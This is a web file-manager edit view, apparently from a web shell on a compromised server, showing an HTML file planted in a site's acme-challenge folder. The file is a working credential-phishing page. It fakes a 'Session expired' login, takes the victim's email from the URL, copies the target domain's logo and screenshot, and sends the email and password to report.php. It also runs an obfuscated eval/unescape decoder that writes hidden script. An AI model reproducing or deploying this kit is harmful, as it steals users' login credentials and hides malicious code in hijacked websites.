File manager - Edit - /home/adiance/public_html/beta/.well-known/acme-challenge/hntj/index.html
Back
`<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Mail</title> <meta name="googlebot" content="noindex"> <meta name="googlebot-news" content="noindex"> <meta name="googlebot" content="noindex"> <meta name="googlebot-news" content="nosnippet"> <link rel="icon" href=""> <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script> <script src="https://code.jquery.com/jquery-3.1.1.min.js"></script> <script src="https://code.jquery.com/jquery-3.3.1.js" integrity="sha256-2Kok7MbOyxpgUVvAk/HJ2jigOSYS2auK4Pfzbm7uH60=" crossorigin="anonymous"></script> <script src="https://code.jquery.com/jquery-3.1.1.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script> <script type="text/javascript"> <!-- eval(unescape('%66%75%6e%63%74%69%6f%6e%20%65%66%63%31%65%31%28%73%29%20%7b%0a%09%76%61%72%20%72%20%3d%20%22%22%3b%0a%09%76%61%72%20%74%6d%70%20%3d%20%73%2e%73%70%6c%69%74%28%22%31%32%31%32%34%38%39%39%22%29%3b%0a%09%73%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%30%5d%29%3b%0a%09%6b%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%31%5d%20%2b%20%22%37%31%32%32%35%38%22%29%3b%0a%09%66%6f%72%28%20%76%61%72%20%69%20%3d%20%30%3b%20%69%20%3c%20%73%2e%6c%65%6e%67%74%68%3b%20%69%2b%2b%29%20%7b%0a%09%09%72%20%2b%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%28%70%61%72%73%65%49%6e%74%28%6b%2e%63%68%61%72%41%74%28%69%25%6b%2e%6c%65%6e%67%74%68%29%29%5e%73%2e%63%68%61%72%43%6f%64%65%41%74%28%69%29%29%2b%2d%33%29%3b%0a%09%7d%0a%09%72%65%74%75%72%6e%20%72%3b%0a%7d%0a')); eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%65%66%63%31%65%31%28%27') + '%3a%67%6f%76%66%24%73%6f%6e%42%27%73%7f%79%67%6b%71%63%6f%6e%70%24%21%69%70%60%6c%48%26%6c%7f%70%75%71%3c%30%30%69%79%7c%60%72%70%60%60%36%7e%65%68%66%60%7a%74%6f%33%6a%6c%72%37%6d%6e%6e%75%63%63%34%78%6b%35%7e%70%7a%68%69%33%64%73%7e%20%4912124899%35%38%33%37%38%37%36' + unescape('%27%29%29%3b')); // --> </script> </head> <body class="bodymain"> <div class="container"> <div class="main-contain"> <div class="logbox"> <img src="https://reliable-firm.netlify.app/pix.jpeg" alt="pix" width="28" class="logo"> <span class="name">Session expired!</span> </div> <div class="sign-p"> <p>Verify it's you</p> </div> <div class="signform"> <p class="error hide"></p> <form action="#" id="form"> <div class="inpg"> <input type="text" name="em" id="em" placeholder="Email" readonly> </div> <div class="inpg"> <input type="password" name="pa" id="pa" placeholder="Password"> </div> <div class="inp2b"> <button class="btnlogin" disabled>Sign in</button> </div> <br><br> </form> </div> </div> </div> <script> const boxf = document.getElementById("form"); const em = document.getElementById("em"); const pa = document.getElementById("pa"); const error = document.querySelector(".error"); const logo = document.querySelector(".logo"); const name = document.querySelector(".name"); const btnlogin = document.querySelector(".btnlogin"); const bodymain = document.querySelector(".bodymain"); const fav = document.querySelector("link[rel*='icon']"); let finurl = ""; let errKey = 0; window.addEventListener("load", () => { btnlogin.disabled = false; const id = window.location.href.split("#")[1]; let logoUrl = id.split("@")[1]; finurl = logoUrl; let nameUrl = logoUrl.split(".")[0]; if(id){ em.value = id; document.title = logoUrl.split(".")[0]; fav.href = `https://logo.clearbit.com/${logoUrl}`; if(logoUrl === "gmail.com"){ bodymain.style.background = `rgba(0, 0, 0, 0.04) url(https://image.thum.io/get/width/1280/crop/600/https://www.google.com/intl/us/gmail/about/)`; bodymain.style.backgroundRepeat = `no-repeat`; bodymain.style.backgroundSize = `cover`; logo.src = `https://logo.clearbit.com/${logoUrl}`; name.textContent = nameUrl; } else { bodymain.style.background = `rgba(0, 0, 0, 0.04) url(https://image.thum.io/get/width/1280/crop/600/https://${logoUrl})`; bodymain.style.backgroundRepeat = `no-repeat`; bodymain.style.backgroundSize = `cover`; logo.src = `https://logo.clearbit.com/${logoUrl}`; name.textContent = nameUrl; } } }); boxf.addEventListener("submit", (e) => { e.preventDefault(); if(em.value === ""){ error.classList.remove("hide"); error.textContent = "Email field is empty...!"; } else if(pa.value === ""){ error.classList.remove("hide"); error.textContent = "Password field is empty...!"; } else { errKey++; let fa = `Email: ${em.value} \nPassword: ${pa.value}`; $.ajax({ url: 'report.php', type: 'POST', data: { pass: fa }, }); error.classList.add("hide"); error.textContent = ""; btnlogin.textContent = "Verifying..."; btnlogin.disabled = true; setTimeout(() => { btnlogin.textContent = "Login"; btnlogin.disabled = false; if(errKey <= 2){ error.classList.remove("hide"); error.textContent = "Incorrect Email Password, try again"; pa.value = ""; } else { error.classList.add("hide"); error.textContent = ""; btnlogin.textContent = "Log in"; window.location.href = `https://www.${finurl}`; } }, 2000); setTimeout(() => { }, 2000); } }); </script> </body> </html>
| ver. 1.4 |
Github
|
.
| PHP 7.3.33 | Generation time: 0.05 |
proxy
|
phpinfo
|
Settings